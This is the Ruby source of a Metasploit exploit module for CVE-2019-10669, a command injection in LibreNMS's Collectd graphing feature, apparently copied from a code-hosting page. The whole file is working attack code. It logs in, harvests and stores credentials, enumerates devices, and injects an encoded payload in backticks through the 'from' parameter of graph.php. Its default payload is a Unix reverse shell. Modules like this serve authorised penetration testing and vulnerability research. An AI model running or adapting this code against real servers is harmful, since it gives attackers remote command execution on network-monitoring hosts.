231 lines
No EOL
7.6 KiB
Ruby
Executable file
231 lines
No EOL
7.6 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'LibreNMS Collectd Command Injection',
|
|
'Description' => %q(
|
|
This module exploits a command injection vulnerability in the
|
|
Collectd graphing functionality in LibreNMS.
|
|
|
|
The `to` and `from` parameters used to define the range for
|
|
a graph are sanitized using the `mysqli_escape_real_string()`
|
|
function, which permits backticks. These parameters are used
|
|
as part of a shell command that gets executed via the `passthru()`
|
|
function, which can result in code execution.
|
|
),
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'Eldar Marcussen', # Vulnerability discovery
|
|
'Shelby Pace' # Metasploit module
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2019-10669' ],
|
|
[ 'URL', 'https://www.darkmatter.ae/xen1thlabs/librenms-command-injection-vulnerability-xl-19-017/' ]
|
|
],
|
|
'Platform' => 'unix',
|
|
'Arch' => ARCH_CMD,
|
|
'Targets' =>
|
|
[
|
|
[ 'Linux',
|
|
{
|
|
'Platform' => 'unix',
|
|
'Arch' => ARCH_CMD,
|
|
'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' }
|
|
}
|
|
]
|
|
],
|
|
'DisclosureDate' => '2019-07-15',
|
|
'DefaultTarget' => 0
|
|
))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
|
|
OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
|
|
OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
|
|
])
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi!('method' => 'GET', 'uri' => target_uri.path)
|
|
return Exploit::CheckCode::Safe unless res && res.body.downcase.include?('librenms')
|
|
|
|
about_res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path, 'pages', 'about.inc.php')
|
|
)
|
|
|
|
return Exploit::CheckCode::Detected unless about_res && about_res.code == 200
|
|
|
|
version = about_res.body.match(/version\s+to\s+(\d+\.\d+\.?\d*)/)
|
|
return Exploit::CheckCode::Detected unless version && version.length > 1
|
|
vprint_status("LibreNMS version #{version[1]} detected")
|
|
version = Gem::Version.new(version[1])
|
|
|
|
return Exploit::CheckCode::Appears if version <= Gem::Version.new('1.50')
|
|
end
|
|
|
|
def login
|
|
login_uri = normalize_uri(target_uri.path, 'login')
|
|
res = send_request_cgi('method' => 'GET', 'uri' => login_uri)
|
|
fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200
|
|
|
|
cookies = res.get_cookies
|
|
login_res = send_request_cgi(
|
|
'method' => 'POST',
|
|
'uri' => login_uri,
|
|
'cookie' => cookies,
|
|
'vars_post' =>
|
|
{
|
|
'username' => datastore['USERNAME'],
|
|
'password' => datastore['PASSWORD']
|
|
}
|
|
)
|
|
|
|
fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302
|
|
|
|
cookies = login_res.get_cookies
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path),
|
|
'cookie' => cookies
|
|
)
|
|
fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')
|
|
|
|
print_status('Successfully logged into LibreNMS. Storing credentials...')
|
|
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
|
|
login_res.get_cookies
|
|
end
|
|
|
|
def get_version
|
|
uri = normalize_uri(target_uri.path, 'about')
|
|
|
|
res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies )
|
|
fail_with(Failure::NotFound, 'Failed to reach the about LibreNMS page') unless res && res.code == 200
|
|
|
|
html = res.get_html_document
|
|
version = html.search('tr//td//a')
|
|
fail_with(Failure::NotFound, 'Failed to retrieve version information') if version.empty?
|
|
version.each do |e|
|
|
return $1 if e.text =~ /(\d+\.\d+\.?\d*)/
|
|
end
|
|
end
|
|
|
|
def get_device_ids
|
|
version = get_version
|
|
print_status("LibreNMS version: #{version}")
|
|
|
|
if version && Gem::Version.new(version) < Gem::Version.new('1.50')
|
|
dev_uri = normalize_uri(target_uri.path, 'ajax_table.php')
|
|
format = '+list_detail'
|
|
else
|
|
dev_uri = normalize_uri(target_uri.path, 'ajax', 'table', 'device')
|
|
format = 'list_detail'
|
|
end
|
|
|
|
dev_res = send_request_cgi(
|
|
'method' => 'POST',
|
|
'uri' => dev_uri,
|
|
'cookie' => @cookies,
|
|
'vars_post' =>
|
|
{
|
|
'id' => 'devices',
|
|
'format' => format,
|
|
'current' => '1',
|
|
'sort[hostname]' => 'asc',
|
|
'rowCount' => 50
|
|
}
|
|
)
|
|
|
|
fail_with(Failure::NotFound, 'Failed to access the devices page') unless dev_res && dev_res.code == 200
|
|
|
|
json = JSON.parse(dev_res.body)
|
|
fail_with(Failure::NotFound, 'Unable to retrieve JSON response') if json.empty?
|
|
|
|
json = json['rows']
|
|
fail_with(Failure::NotFound, 'Unable to find hostname data') if json.empty?
|
|
|
|
hosts = []
|
|
json.each do |row|
|
|
hostname = row['hostname']
|
|
next if hostname.nil?
|
|
|
|
id = hostname.match('href=\"device\/device=(\d+)\/')
|
|
next unless id && id.length > 1
|
|
hosts << id[1]
|
|
end
|
|
|
|
fail_with(Failure::NotFound, 'Failed to retrieve any device ids') if hosts.empty?
|
|
|
|
hosts
|
|
end
|
|
|
|
def get_plugin_info(id)
|
|
uri = normalize_uri(target_uri.path, "device", "device=#{id}", "tab=collectd")
|
|
|
|
res = send_request_cgi( 'method' => 'GET', 'uri' => uri, 'cookie' => @cookies )
|
|
return unless res && res.code == 200
|
|
|
|
html = res.get_html_document
|
|
plugin_link = html.at('div[@class="col-md-3"]//a/@href')
|
|
return if plugin_link.nil?
|
|
|
|
plugin_link = plugin_link.value
|
|
plugin_hash = Hash[plugin_link.split('/').map { |plugin_val| plugin_val.split('=') }]
|
|
c_plugin = plugin_hash['c_plugin']
|
|
c_type = plugin_hash['c_type']
|
|
c_type_instance = plugin_hash['c_type_instance'] || ''
|
|
c_plugin_instance = plugin_hash['c_plugin_instance'] || ''
|
|
|
|
return c_plugin, c_type, c_plugin_instance, c_type_instance
|
|
end
|
|
|
|
def exploit
|
|
req_uri = normalize_uri(target_uri.path, 'graph.php')
|
|
@cookies = login
|
|
|
|
dev_ids = get_device_ids
|
|
|
|
collectd_device = -1
|
|
plugin_name = nil
|
|
plugin_type = nil
|
|
plugin_instance = nil
|
|
plugin_type_inst = nil
|
|
dev_ids.each do |device|
|
|
collectd_device = device
|
|
plugin_name, plugin_type, plugin_instance, plugin_type_inst = get_plugin_info(device)
|
|
break if (plugin_name && plugin_type && plugin_instance && plugin_type_inst)
|
|
collectd_device = -1
|
|
end
|
|
|
|
fail_with(Failure::NotFound, 'Failed to find a collectd plugin for any of the devices') if collectd_device == -1
|
|
print_status("Sending payload via device #{collectd_device}")
|
|
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => req_uri,
|
|
'cookie' => @cookies,
|
|
'vars_get' =>
|
|
{
|
|
'device' => collectd_device,
|
|
'type' => 'device_collectd',
|
|
'to' => Rex::Text.rand_text_numeric(10),
|
|
'from' => "1`#{payload.encoded}`",
|
|
'c_plugin' => plugin_name,
|
|
'c_type' => plugin_type,
|
|
'c_plugin_instance' => plugin_instance,
|
|
'c_type_instance' => plugin_type_inst
|
|
}
|
|
)
|
|
end
|
|
end |